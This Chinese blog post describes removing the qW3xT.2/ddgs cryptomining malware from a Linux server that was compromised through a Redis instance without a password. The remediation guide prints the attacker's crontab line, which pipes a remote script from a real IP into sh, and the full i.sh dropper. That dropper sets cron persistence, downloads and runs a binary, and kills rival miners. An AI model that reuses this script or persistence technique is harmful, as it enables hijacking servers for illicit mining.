首页 > 系统相关 >Linux 下qW3xT.2,解决挖矿病毒

Linux 下qW3xT.2,解决挖矿病毒

时间:2023-02-16 18:36:07浏览次数:61  
标签:tmp ps grep qW3xT.2 auxf sh kill Linux 挖矿

早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。
这里写图片描述
在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。

解决办法:

1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis

2、进入/tmp文件夹下。发现qW3xT.2文件,删除。之后kill掉qW3xT.2该进程,但是一段时间之后,发现该行程又重新启动。

肯定是有守护进程,观察top命令下的进程,发现一个可疑的进行

这里写图片描述
3、在/tmp文件夹下发现该进程的文件 ls /tmp

发现qW3xT.2文件又重新生成了。这时,首先删除qW3xT.2文件和ddgs.3013文件,然后使用top查询qW3xT.2和ddgs.3013的pid,直接kill掉。

4、一段时间之后,删除的文件重新生成,dds和挖矿的进程又重新执行。此时怀疑是否有计划任务,此时查看计划任务的列表

[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -l

*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

[root@iZbp1cbg04oh74k1dexpujZ tmp]#  crontab -r   //删除计划任务

curl 的这几个 optional 介绍,我也是百度的
-f - fail在HTTP错误(H)上静默失败(根本没有输出)
-s -silent静音模式。 不要输出任何东西
–socks4 HOST [:PORT]给定主机+端口上的SOCKS4代理
–socks4a HOST [:PORT]给定主机+端口上的SOCKS4a代理
–socks5 HOST [:PORT]给定主机+端口上的SOCKS5代理
–socks5-hostname HOST [:PORT] SOCKS5代理,将主机名传递给代理
–socks5-gssapi-service名称为gssapi的SOCKS5代理服务名称
–socks5-gssapi-nec与NEC SOCKS5服务器的兼容性
-S –show-error显示错误。 使用-s时,make curl会在出现错误时显示错误
-L –location遵循重定向(H)
–location-trusted like –location并将auth发送给其他主机(H)

此时计划任务已经删除。详细信息查看https://juejin.im/post/5b62b975f265da0f9628a820

计划任务删除完成之后,这个13又开始运行。太顽固了。
于是我又看计划任务的内容,是否是有东西没有删除干净。

[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root


mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root


ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then

    curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
发现计划任务在服务器中创建了几个文件,
/var/spool/cron/crontabs/root
/var/spool/cron/root
内容是*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(与计划任务相同)
将计划任务中创建的文件删除。

最终,这个挖矿病毒终于删除完成

标签:tmp,ps,grep,qW3xT.2,auxf,sh,kill,Linux,挖矿
From: https://www.cnblogs.com/hm201402/p/17127867.html

相关文章

  • Linux 修改主机名称
    查看服务器版本信息1.cat/proc/version[root@hm01~]#cat/proc/versionLinuxversion3.10.0-327.el7.x86_64([email protected])(gccversion4.8......
  • Linux定时任务Crontab命令详解
    linux系统则是由cron(crond)这个系统服务来控制的。Linux系统上面原本就有非常多的计划性工作,因此这个系统服务是默认启动的。另外,由于使用者自己也可以设置计划任......
  • Burp Suite Professional 2023.2 (macOS, Linux, Windows) - Web 应用安全、测试和扫
    BurpSuiteProfessional,Test,find,andexploitvulnerabilities.请访问原文链接:https://sysin.org/blog/burp-suite-pro-2023/,查看最新版。原创作品,转载请保留出处。......
  • Linux下Tomcat的启动、关闭
    在Linux系统下,启动和关闭Tomcat使用命令操作。进入Tomcat下的bin目录进入Tomcat下的bin目录cd/java/tomcat/bin启动Tomcat命令cd/java/tomcat/bin停止Tom......
  • linux下定时器的使用 -- alarm() & setitimer()
    Linux下的定时器有两种,以下分别介绍:1、alarm-------------------------------------------   如果不要求很精确的话,用alarm()和signal()就够了   unsignedi......
  • Linux
    1、touch创建文件2、rm 删除文件-f 强制删除-i 发起确认删除-r 删除目录及其内容3、cat/less/more/tail/headcat命令是整个文件的内容从上到......
  • Linux 上pcntl安装步骤
    一。下载对应的PHP源码包wgethttp://cn2.php.net/get/php-5.5.20.tar.gz/from/this/mirror 二。解压下载的源码文件tar-zxvfphp-5.5.20.tar.gz 三。进入ph......
  • 【OpenWrt/Linux】OpenWrt多余磁盘分区重新分区
    仅做记录参考本操作基于NanoPiNeoCore,SD卡中32G内存在刷入OpenWrt后还会有许多剩余空间,通过以下命令可以实现重新分区利用。用ssh连接OpenWrt或者使用自带终端首先使......
  • 阿里云 cloud linux 2 搭建LNMP环境
    2023年2月16日15:38:38官方说明: https://www.alibabacloud.com/help/zh/elastic-compute-service/latest/manually-deploy-an-lnmp-environment-on-an-ecs-instance-tha......
  • linux下只显示文件或是文件夹的方法
    在处理文件相关操作的时,我们可能会用到只显示文件或者是只显示文件夹的功能,可以使用如下命令来实现:只显示文件ls-l|grep^[^d]|awk'{print$8}'1.其中ls-l就......